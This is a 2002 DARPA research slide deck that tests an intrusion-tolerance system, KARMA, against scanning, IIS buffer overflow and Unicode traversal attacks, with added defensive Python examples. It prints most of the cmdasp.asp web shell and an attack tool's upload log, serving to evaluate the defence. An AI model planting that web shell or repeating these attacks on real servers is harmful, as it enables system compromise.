KARMA: Kinetic Application of Redundancy to Mitigate Attacks
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 – Aegis Research Corporation


Slide 1
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002
Aegis Research Corporation

KARMA: Kinetic Application of Redundancy to Mitigate Attacks
(Intrusion Tolerance Using Masking, Redundancy and Dispersion)
Janet Lepanto, William Weinstein
The Charles Stark Draper Laboratory, Inc.
Aegis Research Corporation

Slide 2: Overview
– Objectives and Assumptions
– Preliminary Test Results
– Validation Test Strategy

Slide 3: Objectives and Assumptions
Objectives
– Employ only a small set of trusted components to protect a large set of untrusted, unmodified COTS servers and databases
– Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers
– Tolerate attacks whose specific signatures are not known a priori
Assumptions
– The attacker desires stealth, so transaction rates will be relatively low
– Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms
– Exploitation of latent vulnerabilities will require more than a single transaction

Slide 4: Architecture
(Diagram.) Components: External WAN, External Firewall, Gateway, Switched IP, Server (1), Server (2), ..., Server (N), Switched IP, Transaction Mediator, Data Base, Configuration Manager. Legend: COTS, Trusted, Other.

Slide 5: Mechanisms
Gateway
– Mask the identities of origin server operating systems and web server applications
– Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction
Configuration Manager
– Monitor the status of origin servers (via an agent on each server) for anomalies
– Reconfigure a server to a “clean” state if anomalies are detected
Transaction Mediator
– Log transactions to the back-end database to support rollback recovery

Slide 6: KARMA Preliminary Testing
Discovery
– OS identification
– Web server enumeration
– Probing with a malformed request
Web Server Exploitation
– Buffer overflow exploit to get a command shell
– Unicode exploit
– Multi-transaction Unicode attack to plant an executable
– Smart multi-transaction attack with server agents active

Slide 7: Discovery (OS Identification)
– OS identification attempts to guess the operating system and version of a remote system
– Freely available programs used for OS identification include xprobe (ICMP based), queso, and nmap
– By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures
– KARMA masks the OS identity of the Gateway
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 8: Discovery (OS Identification)
OS identification run against the KARMA public IP address:
– Unable to determine the OS of the remote system
– Time required for this activity is relatively long

    With-KARMA]# nmap -sT -n -r -p 80 -P0 -O its.c4i.draper.com
    Starting nmap V by ( )
    Interesting ports on ( ):
    Port State Service
    80/tcp open http
    TCP Sequence Prediction: Class=random positive increments
    Difficulty=38245 (Worthy challenge)
    No OS matches for host (If you know what OS is running on it, see
    Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds

Slide 9: Discovery (Web Server Enumeration)
– Web server enumeration attempts to remotely determine the currently running version of the web server software
– In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response
– Successful enumeration allows a hacker to focus the attack against the specific web server software
– KARMA scrubs web server responses to mask the identity of the responding web server
  – Removes specific identifying information (e.g., the “Server” header)
  – Removes server-unique information such as ETags
  – Reformats error responses to mask server-unique implementations
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 10: Discovery (Web Server Enumeration)
Probe the web server directly:
– Issue the HEAD command to the server
– The “Server” field identifies the server as Microsoft-IIS/4.0

    Without-KARMA]# nc
    HEAD / HTTP/1.0

    HTTP/ OK
    Server: Microsoft-IIS/4.0
    Content-Location:
    Date: Fri, 04 Jan :41:23 GMT
    Content-Type: text/html
    Accept-Ranges: bytes
    Last-Modified: Wed, 02 Jan :36:45 GMT
    ETag: "804e5a95c5ec11:b84"
    Content-Length: 6783

Slide 11: Discovery (Web Server Enumeration)
Probe the web server via KARMA:
– Issue the HEAD command to the server
– The “Server” field is no longer present in the HTTP response

    With-KARMA]# nc its.c4i.draper.com 80
    HEAD / HTTP/1.0

    HTTP/ OK
    Connection: close
    Date: Fri, 04 Jan :40:28 GMT
    Accept-Ranges: bytes
    Content-Length: 6913
    Content-Type: text/html
    Last-Modified: Wed, 02 Jan :36:45 GMT

Slide 12: Discovery (Probing with a Malformed Request)
– A system often discloses information when responding to erroneous conditions
– Attackers can trigger such disclosure and use the information to create a blueprint of the target network
– Upon receiving a malformed request to an existing directory, the web server responds with an error message that contains its internal IP address
– KARMA sanitizes error responses from the web servers and then forwards them to the user
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 13: Discovery (Probing with a Malformed Request)
Issue “GET /html” directly to an origin server:
– The web server returns a “302 Object Moved” error
– The error message contains the internal IP address

    Without-KARMA]# nc
    GET /html HTTP/1.0

    HTTP/ Object Moved
    Location:
    Server: Microsoft-IIS/4.0
    Content-Type: text/html
    Content-Length: 141

    Document Moved
    Object Moved
    This document may be found here

Slide 14: Discovery (Probing with a Malformed Request)
Issue “GET /html” via KARMA:
– The web server returns a “301 Moved Permanently” error
– The error message does not contain the internal IP address

    With-KARMA]# nc its.c4i.draper.com 80
    GET /html HTTP/1.0

    HTTP/ Moved Permanently
    Connection: close
    Location:
    Content-Length:

    Moved Permanently
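The scrubbing the Web Server Enumeration and Probing with a Malformed Request slides attribute to the Gateway (drop the “Server” header and ETags, and reformat error responses so they no longer carry the origin's internal address or product-specific wording) can be written as a small response filter. The following is an added example, not the KARMA gateway's own code. It assumes a header list of its own choosing (Server, ETag, Content-Location), treats private addresses as “internal” hosts to rewrite in a Location header, and substitutes a generic plain-text body for every 3xx/4xx/5xx response; the two sample responses are constructed in the style of the slides, with 10.1.2.3 standing in for an origin server's internal IP and www.example.com for the public name.

```python
"""Gateway-side HTTP response scrubbing (added example, not KARMA's code)."""
import ipaddress
from http import HTTPStatus
from urllib.parse import urlsplit, urlunsplit

# Headers that name the origin product or are unique to one origin instance
# (list is this example's choice; real deployments usually add more).
STRIP_HEADERS = {"server", "etag", "content-location"}


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (version, status code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    version, code = parts[0], int(parts[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")   # only the first ':' separates name/value
        headers.append((name.strip(), value.strip()))
    return version, code, headers, body


def _is_internal_host(host: str) -> bool:
    """True for private/loopback/link-local addresses; host names are left alone."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def rewrite_location(value: str, public_host: str) -> str:
    """Replace an internal host in a redirect target with the gateway's public name."""
    u = urlsplit(value)
    if u.hostname and _is_internal_host(u.hostname):
        return urlunsplit((u.scheme, public_host, u.path, u.query, u.fragment))
    return value


def scrub_response(raw: bytes, public_host: str) -> bytes:
    """Return the response the gateway would forward to the client."""
    version, code, headers, body = parse_response(raw)
    try:
        reason = HTTPStatus(code).phrase   # standard phrase, not the origin's own wording
    except ValueError:
        reason = "Error" if code >= 400 else "OK"
    kept = []
    for name, value in headers:
        lname = name.lower()
        if lname in STRIP_HEADERS or lname == "connection":
            continue
        if lname == "location":
            value = rewrite_location(value, public_host)
        kept.append((name, value))
    if code >= 300:
        # The origin's error page may embed paths, host names or product-specific
        # markup, so it is replaced by a generic body with matching length headers.
        body = (reason + "\r\n").encode("ascii")
        kept = [(n, v) for n, v in kept if n.lower() not in ("content-type", "content-length")]
        kept += [("Content-Type", "text/plain"), ("Content-Length", str(len(body)))]
    kept.insert(0, ("Connection", "close"))
    head = "\r\n".join([f"{version} {code} {reason}"] + [f"{n}: {v}" for n, v in kept])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def header(raw: bytes, name: str):
    """Value of the first header called `name` in a raw response, or None."""
    for n, v in parse_response(raw)[2]:
        if n.lower() == name.lower():
            return v
    return None


# Constructed samples modelled on the slides' IIS 4.0 responses.
ORIGIN_HEAD = (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
               b"Content-Location: http://10.1.2.3/Default.htm\r\n"
               b"Date: Fri, 04 Jan 2002 15:41:23 GMT\r\nContent-Type: text/html\r\n"
               b"Accept-Ranges: bytes\r\nLast-Modified: Wed, 02 Jan 2002 19:36:45 GMT\r\n"
               b"ETag: \"804e5a95c5ec11:b84\"\r\nContent-Length: 6783\r\n\r\n")
ORIGIN_302 = (b"HTTP/1.1 302 Object Moved\r\nLocation: http://10.1.2.3/html/\r\n"
              b"Server: Microsoft-IIS/4.0\r\nContent-Type: text/html\r\nContent-Length: 141\r\n\r\n"
              b"<head><title>Document Moved</title></head><body><h1>Object Moved</h1>"
              b"This document may be found <a HREF=\"http://10.1.2.3/html/\">here</a></body>")

if __name__ == "__main__":
    print(scrub_response(ORIGIN_302, "www.example.com").decode("latin-1"))
    print(scrub_response(ORIGIN_HEAD, "www.example.com").decode("latin-1"))
```

Run against the constructed 302, the filter emits “HTTP/1.1 302 Found” with a Location of http://www.example.com/html/ and a seven-byte generic body; the HEAD response keeps its Date, Content-Type and Content-Length but loses Server, ETag and Content-Location, which is the shape of the With-KARMA output on the previous slides.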

Slide 15: Web Server Exploitation (Buffer Overflow)
– The Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit
– The exploit causes a buffer overflow on the IIS web server, which returns a command shell to the attacker on TCP port 81
– This command shell has administrator-level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 16: Web Server Exploitation (Buffer Overflow)
Execute directly against the server and listen for a shell on port 81:
– Command shell returned from the server
– The “ver” command returns the version of Windows
– “ipconfig /all” reports the server’s network configuration

Slide 17: Web Server Exploitation (Buffer Overflow)
Execute via KARMA and listen for a shell on port 81:
– Unsuccessful: the command shell is never returned
– Attack is thwarted

Slide 18: Web Server Exploitation (Unicode Exploit)
– Microsoft IIS 4.0 and 5.0 are both vulnerable to double-dot (“../”) directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af)
– This vulnerability enables unauthenticated users to access any known file or program on the web server
– Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 19: Web Server Exploitation (Unicode Exploit)
Execute the Unicode attack directly against the server:
– “dir c:\” reveals the contents of the root directory
– The “ver” command returns the version of Windows

Slide 20: Web Server Exploitation (Unicode Exploit)
Execute the Unicode attack via KARMA:
– “dir c:\” sent to the server several times before success
– “ver” returns an error message for every request

Slide 21: Web Server Exploitation (Multi-Transaction)
– A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions); for example, uploading a file line by line using the Windows “echo” command
– Attacker uploads scripts to exploit the web server:
  – cmdasp.asp (exploit allows the attacker to execute commands with system-level privileges)
  – upload.asp (script allows an attacker to upload files via HTTP)
– KARMA dispersion makes multi-transaction attacks more difficult
  – Increases the time required to exploit the web server
  – Increases the attack signature and probability of detection
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))
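The slide's two claims about dispersion (it raises the time an attack needs and it enlarges the attack signature) follow from how the Gateway picks a server. The added example below, which is not KARMA's own code, assumes the Gateway chooses an origin server uniformly at random for each transaction; the slides say only that the client cannot predict which server handles a transaction. It models a file sent one line per transaction (36 lines, the count shown in the upload log on a later slide) across N servers: the chance that every line lands on one server, where the fragments end up, and how many transactions a retry-until-verified variant would need on average. The stray fragments left on the other servers are what the server agents later report as unauthorized files.

```python
"""Transaction dispersion across origin servers (added example, not KARMA's code)."""
import random
import secrets
from collections import defaultdict


class DispersingGateway:
    """Chooses an origin server per transaction with a CSPRNG, so a client cannot
    predict or steer which server sees its next request. Round-robin or a hash of
    the source address would be predictable and defeat the purpose."""

    def __init__(self, n_servers: int):
        if n_servers < 1:
            raise ValueError("need at least one origin server")
        self.n_servers = n_servers

    def pick(self) -> int:
        return secrets.randbelow(self.n_servers)


def p_all_on_one_server(n_servers: int, k_transactions: int) -> float:
    """Probability that k independent, uniformly dispersed transactions all reach
    the same origin, i.e. that a k-part file build-up completes in a single pass."""
    return n_servers ** -(k_transactions - 1)


def simulate_buildup(n_servers: int, k_parts: int, seed=None) -> dict:
    """Send a k-part file, one part per transaction, through a dispersing gateway
    and return {server index: [part numbers it received]}. A seeded PRNG keeps
    the simulation repeatable; real dispatch uses DispersingGateway.pick()."""
    rng = random.Random(seed)
    placed = defaultdict(list)
    for part in range(1, k_parts + 1):
        placed[rng.randrange(n_servers)].append(part)
    return dict(placed)


def assembled_anywhere(placed: dict, k_parts: int) -> bool:
    """True if some single server received every part, in order."""
    return any(parts == list(range(1, k_parts + 1)) for parts in placed.values())


def expected_transactions_with_retry(n_servers: int, k_parts: int):
    """Average cost of a build-up that verifies each part and retries until it
    lands on the server holding the earlier parts: after the first part, each
    further part needs n tries on average (geometric, p = 1/n), so about
    1 + n*(k-1) uploads; doubling that counts one verification per try."""
    uploads = 1 + n_servers * (k_parts - 1)
    return uploads, 2 * uploads


if __name__ == "__main__":
    placed = simulate_buildup(4, 36, seed=7)
    print("fragments per server:", {s: len(p) for s, p in sorted(placed.items())})
    print("complete file on any server:", assembled_anywhere(placed, 36))
    print("P(all 36 on one of 4 servers):", p_all_on_one_server(4, 36))
    print("uploads, total transactions with retry:", expected_transactions_with_retry(4, 36))
```

With four servers the single-pass success probability is 4^-35, and the verified-retry variant needs roughly 141 uploads and 282 transactions in total for a 36-line file, against 36 uploads when a single server is addressed directly; the extra transactions are the larger signature the slide refers to, and every failed try leaves a fragment on a server that will not assemble it.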

Slide 22: Web Server Exploitation (Multi-Transaction)
– unicodeloader.pl uploads the file cmdasp.asp line by line, utilizing the “echo” command in multiple Unicode strings
– cmdasp.asp is a web script that exploits a local Windows vulnerability, enabling the attacker to execute commands with system-level privileges
– The attacker accesses cmdasp.asp with a web browser and enters commands

Slide 23: Web Server Exploitation (Multi-Transaction)
Attack the web server directly

Slide 24: Web Server Exploitation (Multi-Transaction)
Attack the web servers via KARMA

Slide 25: Web Server Exploitation (Multi-Transaction)

“cmdasp.asp” without KARMA

    <%
    3 - Dim oScript
    4 - Dim oScriptNet
    5 - Dim oFileSys, oFile
    6 - Dim szCMD, szTempFile
    7 - On Error Resume Next
    8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")
    9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
    10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
    11 - szCMD = Request.Form(".CMD")
    12 - If (szCMD <> "") Then
    13 - szTempFile = "C:\" & oFileSys.GetTempName( )
    14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
    16 - End If
    17 - %>
    " method="POST">
    21 - ">
    <%
    28 - If (IsObject(oFile)) Then
    29 - On Error Resume Next
    30 - Response.Write Server.HTMLEncode(oFile.ReadAll)
    31 - oFile.Close
    32 - Call oFileSys.DeleteFile(szTempFile, True)
    33 - End If
    34 - %>

“cmdasp.asp” with KARMA

    3 - Dim oScriptNet
    10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
    13 - szTempFile = "C:\" & oFileSys.GetTempName( )
    17 - %>
    20 - " method="POST">
    If (IsObject(oFile)) Then
    32 - Call oFileSys.DeleteFile(szTempFile, True)
    36 -

Slide 26: Web Server Exploitation (KARMA Server Agents Active)
– An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking
– Upload a line of the script and then recursively check for success
  – Create a unique directory and “echo” the first line of the script
  – Check the unique directory for file size to verify a successful upload
  – If successful, “echo” line two and continue the process; else retry the first line
– The Server Agent detects changes to the origin server configuration
  – Server stopped and taken out of service by the Configuration Manager
  – Rebuilt from trusted archive
  – Returned to service
(Diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N))

Slide 27: Web Server Exploitation (KARMA Server Agents Active)
Advanced Unicode upload utility with error checking:
– First line successfully uploaded to the server on the first attempt
– Second line fails several times due to the dispersion mechanism
– Agent identifies the attack and shuts down the server

    With-KARMA]# adv-uniloader.pl :80 cmdasp.asp
    exploiting directory: C:\Inetpub\scripts\adv-uniloader
    uploading ASP section:
    sending line 1 of 36
    Checking directory for upload..
    Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
    sending line 2 of 36
    Checking directory for upload..
    Upload NOT successfull cmdasp.asp is still 4482 bytes
    sending line 2 of 36
    Checking directory for upload..
    Upload NOT successfull cmdasp.asp is still 4482 bytes
    sending line 2 of 36
    Checking directory for upload..
    Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes.
    sending line 3 of 36
    Checking directory for upload..

Slide 28: Web Server Exploitation (KARMA Server Agent Log)
Server 4 Agent log file:
– No anomalies detected by the Server Agent on server 4
– Attack detected: stop the server, refresh content to the original data, and restart the web service
– Attack remediated, server 4 back to normal operation

    in tier 3: tier completion reporting, verbosity 1, failures 0
    in tier 2: tier completion reporting, verbosity 1, failures 0
    in tier 2: tier completion reporting, verbosity 1, failures 1
    connection to CM closed: fd=164
    The World Wide Web Publishing Service service is stopping.
    got cleanup_restart command
    The World Wide Web Publishing Service service was stopped successfully.
    The IIS Admin Service service is stopping...
    The IIS Admin Service service was stopped successfully.
    The Content Index service is stopping.
    The Content Index service was stopped successfully.
    The Content Index service is starting.
    The Content Index service was started successfully.
    The World Wide Web Publishing Service service is starting...
    The World Wide Web Publishing Service service was started successfully.
    in osa: need to refresh tier 1
    in osa: need to refresh tier 2
    in osa: need to refresh tier 3
    in osa: need to refresh tier 4
    in tier 2: tier completion reporting, verbosity 1, failures 0

Slide 29: Web Server Exploitation (KARMA Configuration Manager Log)
Configuration Manager log file:
– Server agents reporting OK
– Problem identified by server 4: unauthorized file c:\inetpub\scripts\advuni\cmdasp.asp detected
– Server 4 back to normal operation, servers reporting OK

    c:\Inetpub\scripts\advuni\cmdasp.asp 2
    field 4: filesize different: ref=4482 gath=4487
    field 6: mtime different: ref= :0 gath=
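The agent log on the previous slides and the Configuration Manager entries above come from a reference-versus-gathered comparison of the origin server's files. The following is an added example of that check, not KARMA's agent code. It snapshots a web root into a per-file record (type, permissions, size, link count, mtime, SHA-256), compares a later snapshot against it, and reports in the slide's style (a path line with the number of differing fields, then one line per field); the field numbering is this example's own layout, arranged so that field 4 is the file size and field 6 the mtime as in the log above. The demo scenario is constructed: one script grows from 4482 to 4487 bytes and a new file is planted.

```python
"""File-integrity check in the style of the KARMA server agent (added example)."""
import hashlib
import pathlib
import tempfile

# One record per regular file, numbered from 1 in reports so the differing field
# can be named. Layout is this example's choice (field 4 = size, field 6 = mtime).
FIELDS = ("path", "type", "perm", "size", "nlink", "mtime", "sha256")
LABEL = {"type": "type", "perm": "permissions", "size": "filesize",
         "nlink": "links", "mtime": "mtime", "sha256": "checksum"}


def _sha256(path: pathlib.Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def gather(root) -> dict:
    """Walk root and return {relative path: record} for every regular file.
    Directories are not recorded; a planted file shows up as a path absent
    from the reference, a modified one as differing fields."""
    root = pathlib.Path(root)
    records = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        st = p.stat()
        rel = p.relative_to(root).as_posix()
        records[rel] = (rel, "f", oct(st.st_mode & 0o777), st.st_size,
                        st.st_nlink, st.st_mtime_ns, _sha256(p))
    return records


def compare(reference: dict, gathered: dict) -> list:
    """Report lines for every difference between the two snapshots."""
    report = []
    for rel in sorted(set(reference) | set(gathered)):
        ref, gath = reference.get(rel), gathered.get(rel)
        if ref is None:
            report.append(f"{rel}: not in reference (unauthorized file)")
            continue
        if gath is None:
            report.append(f"{rel}: missing")
            continue
        diffs = [i for i in range(1, len(FIELDS)) if ref[i] != gath[i]]
        if diffs:
            report.append(f"{rel} {len(diffs)}")
            for i in diffs:
                report.append(f"field {i + 1}: {LABEL[FIELDS[i]]} different: "
                              f"ref={ref[i]} gath={gath[i]}")
    return report


def check(reference: dict, root):
    """What the agent runs on a schedule: (clean?, report lines)."""
    report = compare(reference, gather(root))
    return not report, report


def demo():
    """Constructed scenario: snapshot a small web root, then append five bytes to
    one script (4482 -> 4487 bytes, as in the slide) and plant a new file."""
    with tempfile.TemporaryDirectory() as tmp:
        site = pathlib.Path(tmp)
        (site / "scripts").mkdir()
        (site / "default.htm").write_bytes(b"<html>hello</html>")
        (site / "scripts" / "upload.asp").write_bytes(b"x" * 4482)
        reference = gather(site)            # taken from the trusted build
        clean_before, _ = check(reference, site)
        with (site / "scripts" / "upload.asp").open("ab") as f:
            f.write(b"line2")
        (site / "scripts" / "planted.asp").write_bytes(b"<% %>")
        clean_after, report = check(reference, site)
    return clean_before, clean_after, report


if __name__ == "__main__":
    before, after, lines = demo()
    print("clean before:", before, "clean after:", after)
    print("\n".join(lines))
```

A non-empty report is the trigger for the Configuration Manager's "stop, rebuild from trusted archive, return to service" sequence; the mtime line is reported when the filesystem's timestamp resolution shows a change, while size and checksum always do for a modified file.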

Slide 30: Summary of Preliminary Test Results
Discovery
– Scanning tools could not determine the OS of the Gateway; origin servers are not directly exposed to OS scans
– Probing to provoke web server error responses failed to uncover the web server type
Web Server Exploitation
– Buffer overflow of the printing extension failed to return a command shell
– Execution of single-string Unicode exploits was slowed by the dispersion mechanism
  – KARMA architecture rendered some “pseudo shell commands” ineffective
  – Exploit was able to return directory information
– Multi-transaction file build-up thwarted by the dispersion mechanism
– Smart multi-transaction file build-up stopped by the server agent

Slide 31: Validation Test Strategy
Controlled Vulnerability Testing
– Configure origin servers with known weaknesses
– Compare the effect of attacks directly on a server with the same attack via KARMA
Blind Red Team Testing
– Configure origin servers with the latest security patches
– Give the Red Team no information at all about the system
– Objective is to compromise the database
Targeted Red Team Testing
– Configure origin servers with the latest security patches
– Inform the Red Team about the general architecture and operating strategy, but provide no details
– Objective is to compromise the database